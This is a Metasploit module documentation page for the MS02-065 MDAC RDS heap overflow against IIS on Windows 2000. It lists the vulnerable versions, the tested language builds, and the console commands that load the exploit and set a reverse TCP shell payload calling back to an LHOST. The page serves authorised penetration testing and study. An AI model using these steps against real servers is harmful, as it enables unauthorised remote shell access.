Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/windows/iis/ms02_065_msadc.md
Views: 11788
Vulnerable Application
This module can be used to execute arbitrary code on IIS servers that expose the /msadc/msadcs.dll Microsoft Data Access Components (MDAC) Remote Data Service (RDS) DataFactory service. The service is exploitable even when RDS is configured to deny remote connections (handsafe.reg). The service is vulnerable to a heap overflow where the RDS DataStub 'Content-Type' string is overly long. Microsoft Data Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.
This module has been tested successfully on:
Windows 2000 Pro SP0-SP3 (English)
Windows 2000 Pro SP0 (Korean)
Windows 2000 Pro SP0 (Dutch)
Windows 2000 Pro SP0 (Finnish)
Windows 2000 Pro SP0 (Turkish)
Windows 2000 Pro SP0-SP1 (Greek)
Windows 2000 Pro SP1 (Arabic)
Windows 2000 Pro SP1 (Czech)
Windows 2000 Pro SP2 (French)
Windows 2000 Pro SP2 (Portuguese)
Verification Steps
use exploit/windows/iis/ms02_065_msadc
set RHOSTS [IP]
show targets
to see the possible targetsset TARGET [TARGET]
set PAYLOAD windows/shell/reverse_tcp
set LHOST [IP]
run
Options
TARGETURI
The path to msadcs.dll
(Default: /msadc/msadcs.dll
)